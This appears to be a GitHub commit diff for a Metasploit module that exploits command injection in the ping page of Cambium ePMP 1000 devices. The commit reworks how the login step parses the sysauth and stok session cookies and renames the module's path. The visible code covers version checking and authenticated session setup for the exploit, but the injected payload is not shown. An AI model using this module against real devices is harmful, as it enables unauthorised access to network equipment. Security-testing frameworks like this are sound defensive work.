Skip to content

Commit a86abb0

Browse files
juushyajuushya
committed
Implemented get_cookies_parsed
1 parent 5dfb5d5 commit a86abb0

File tree

1 file changed

+16
-10
lines changed

1 file changed

+16
-10
lines changed

modules/exploits/linux/http/epmp1000_ping_cmd_shell.rb renamed to modules/exploits/unix/http/epmp1000_ping_cmd_shell.rb

Lines changed: 16 additions & 10 deletions
Original file line numberDiff line numberDiff line change
@@ -103,7 +103,7 @@ def check
103103
if (success != 'false' && !epmp_ver.nil? && epmp_ver < '2.5')
104104
return CheckCode::Vulnerable
105105
else
106-
return CheckCode::Safe # Using 'Safe' here to imply this ver is not exploitable using the module'
106+
return CheckCode::Safe # Using 'Safe' here to imply this ver is not exploitable using ~the module~'
107107
end
108108
end
109109

@@ -128,16 +128,19 @@ def login(user, pass)
128128
)
129129

130130
cookies = res.get_cookies_parsed
131+
check_sysauth = cookies.values.select { |v| v.to_s =~ /sysauth_/ }.first.to_s
132+
131133
good_response = (
132134
res &&
133135
res.code == 200 &&
134-
cookies.include?('sysauth')
136+
check_sysauth.include?('sysauth')
135137
)
136138

137139
if good_response
138-
sysauth_value = cookies.match(/((.*)[$ ])/)
140+
sysauth_dirty = cookies.values.select { |v| v.to_s =~ /sysauth_/ }.first.to_s
141+
sysauth_value = sysauth_dirty.match(/((.*)[$ ])/)
139142

140-
cookie1 = "#{sysauth_value}; " + "globalParams=%7B%22dashboard%22%3A%7B%22refresh_rate%22%3A%225%22%7D%2C%22#{user}%22%3A%7B%22refresh_rate%22%3A%225%22%7D%7D"
143+
cookie1 = "#{sysauth_value}" + "globalParams=%7B%22dashboard%22%3A%7B%22refresh_rate%22%3A%225%22%7D%2C%22#{user}%22%3A%7B%22refresh_rate%22%3A%225%22%7D%7D"
141144

142145
res = send_request_cgi(
143146
{
@@ -158,21 +161,24 @@ def login(user, pass)
158161
)
159162

160163
cookies = res.get_cookies_parsed
164+
161165
good_response = (
162166
res &&
163167
res.code == 200 &&
164-
cookies.include?('stok=') &&
168+
cookies.has_key?('stok') &&
165169
!res.body.include?('Maximum number of users reached.')
166170
)
167171

168172
if good_response
169173
print_good("SUCCESSFUL LOGIN - #{rhost}:#{rport} - #{user.inspect}:#{pass.inspect}")
170174

171-
# get the cookie now
172-
get_stok = cookies.match(/stok=(.*)/)
173-
stok_value = get_stok[1]
174-
sysauth_value = cookies.match(/((.*)[$ ])/)
175-
final_cookie = "#{sysauth_value}; " + "globalParams=%7B%22dashboard%22%3A%7B%22refresh_rate%22%3A%225%22%7D%2C%22#{user}%22%3A%7B%22refresh_rate%22%3A%225%22%7D%7D; userType=Installer; usernameType=installer; stok=" + "#{stok_value}"
175+
# get the final cookie now
176+
cookies = res.get_cookies_parsed
177+
stok_value = cookies.has_key?('stok') && cookies['stok'].first
178+
sysauth_dirty = cookies.values.select { |v| v.to_s =~ /sysauth_/ }.first.to_s
179+
sysauth_value = sysauth_dirty.match(/((.*)[$ ])/) # gets sysauth_*
180+
181+
final_cookie = "#{sysauth_value}" + "globalParams=%7B%22dashboard%22%3A%7B%22refresh_rate%22%3A%225%22%7D%2C%22#{user}%22%3A%7B%22refresh_rate%22%3A%225%22%7D%7D; userType=Installer; usernameType=installer; stok=" + "#{stok_value}"
176182

177183
# create config_uri
178184
config_uri_ping = '/cgi-bin/luci/;stok=' + "#{stok_value}" + '/admin/ping'

0 commit comments

Comments
 (0)